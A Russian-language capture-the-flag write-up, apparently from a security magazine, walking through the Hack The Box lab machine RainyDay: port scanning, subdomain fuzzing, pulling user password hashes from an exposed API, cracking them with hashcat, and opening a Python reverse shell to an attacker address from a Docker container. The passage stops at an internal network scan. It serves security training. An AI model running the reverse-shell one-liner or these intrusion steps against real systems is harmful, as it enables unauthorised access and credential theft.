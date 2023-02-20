В этом рай­тапе я покажу, как мож­но про­экс­плу­ати­ровать уяз­вимость в API веб‑при­ложе­ния, что­бы получить дос­туп к хос­ту. Затем вый­дем из песоч­ницы Python и покопа­емся в крип­тогра­фии, что­бы получить кри­тичес­ки важ­ные дан­ные и повысить при­виле­гии в сис­теме.

На­шей целью будет зах­ват учеб­ной машины RainyDay с пло­щад­ки Hack The Box. Ее уро­вень — слож­ный.

warning

Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

 

Разведка

 

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts:

10.10.11.184 rainyday.htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Результат работы скрипта
Ре­зуль­тат работы скрип­та

Наш­лось два откры­тых пор­та: 22 — служ­ба OpenSSH 8.9p1 и 80 — веб‑сер­вер Nginx 1.18.0. На SSH нам пока заходить рано, пос­коль­ку учет­ных дан­ных у нас нет (а переби­рать их на машине с HTB не пред­полага­ется).

В заголов­ке отве­та веб‑сер­вера Nmap нашел поле http-title, которое сооб­щает о редирек­те на адрес rainycloud.htb. Поэто­му изме­ним запись в фай­ле /etc/hosts и обра­тим­ся к новому сай­ту через бра­узер.

10.10.11.184 rainyday.htb rainycloud.htb
Главная страница сайта http://rainycloud.htb/
Глав­ная стра­ница сай­та http://rainycloud.htb/
 

Точка входа

Да­вай пос­тро­им кар­ту сай­та в Burp Suite, что­бы луч­ше ори­енти­ровать­ся. Для это­го выбира­ем любой зап­рос к целево­му сай­ту и в кон­текс­тном меню кли­каем Engagement tool → Discovery content. Пос­ле окон­чания ска­ниро­вания на вклад­ке Site map уви­дим что‑то похожее на скрин ниже.

Карта сайта rainycloud.htb
Кар­та сай­та rainycloud.htb

Ког­да Burp Suite стро­ит кар­ту, он не толь­ко ска­ниру­ет катало­ги и фай­лы, но и собира­ет ссыл­ки и перехо­дит по ним. Так как не про­исхо­дит ска­ниро­вания под­доменов, то выпол­ним его с помощью ffuf.

Справка: сканирование веба c ffuf

Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и DIRB.

Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке ука­зыва­ем сле­дующие парамет­ры:

  • -u — URL;
  • -w — сло­варь (я исполь­зую сло­вари из набора SecLists);
  • -H — допол­нитель­ный HTTP-заголо­вок;
  • -t — количес­тво потоков;
  • -fs — филь­тр, исклю­чающий стра­ницы по раз­меру.
ffuf -u 'http://rainycloud.htb' -w subdomains-top1million-110000.txt -H "Host: FUZZ.rainycloud.htb" -t 256 -fs 229
Результат сканирования каталогов с помощью ffuf
Ре­зуль­тат ска­ниро­вания катало­гов с помощью ffuf

До­бав­ляем новый домен в файл /etc/hosts.

10.10.11.184 rainyday.htb rainycloud.htb dev.rainycloud.htb

Но сайт на новом домене нам недос­тупен, о чем говорит код отве­та 403. Зато на кар­те сай­та есть инте­рес­ная стра­ница /api/.

Страница /api/
Стра­ница /api/

Эн­дпо­инт /api/list показы­вает нам единс­твен­ный сущес­тву­ющий образ Docker.

Существующие докер-образы
Су­щес­тву­ющие докер‑обра­зы

Еще мы можем зап­росить URL вида /api/user/<id>, что­бы получить информа­цию о поль­зовате­ле. Нем­ного поиг­рав с фор­матом id, я получил три име­ни поль­зовате­ля и хеши их паролей.

Данные пользователя jack
Дан­ные поль­зовате­ля jack
Данные пользователя root
Дан­ные поль­зовате­ля root
Данные пользователя gary
Дан­ные поль­зовате­ля gary
 

Точка опоры

Най­ден­ные хеши были соз­даны алго­рит­мом bcrypt, который устой­чив к перебо­ру, — работа hashcat заняла око­ло 25 минут. Для перебо­ра bcrypt нуж­но исполь­зовать режим 3200 (параметр -m).

hashcat -m 3200 hashes.txt rockyou.txt
Результат перебора хешей
Ре­зуль­тат перебо­ра хешей

С най­ден­ным паролем авто­ризу­емся на сай­те и получа­ем воз­можность соз­дать кон­тей­нер Docker.

Главная страница сайта
Глав­ная стра­ница сай­та

Соз­даем новый кон­тей­нер, и нам откры­вает­ся панель управле­ния кон­тей­нером.

Главная страница сайта
Глав­ная стра­ница сай­та

Внут­ри кон­тей­нера мож­но выпол­нять коман­ды, поэто­му получим реверс‑шелл. В качес­тве лис­тенера я исполь­зую pwncat. Так как реверс‑шелл дол­жен висеть дол­го, выпол­няем коман­ду в фоновом режиме:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.17",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/sh")'

По­луча­ем сес­сию и про­веря­ем внут­реннюю сеть.

Настройки сетевого адаптера
Нас­трой­ки сетево­го адап­тера
 

Продвижение

 

Пользователь jack

Заг­рузим на хост ста­тичес­ки соб­ранный Nmap и най­дем дру­гие хос­ты (кон­тей­неры) в сети.

./nmap -sn 172.18.0.0/24
Результат сканирования сети
Ре­зуль­тат ска­ниро­вания сети

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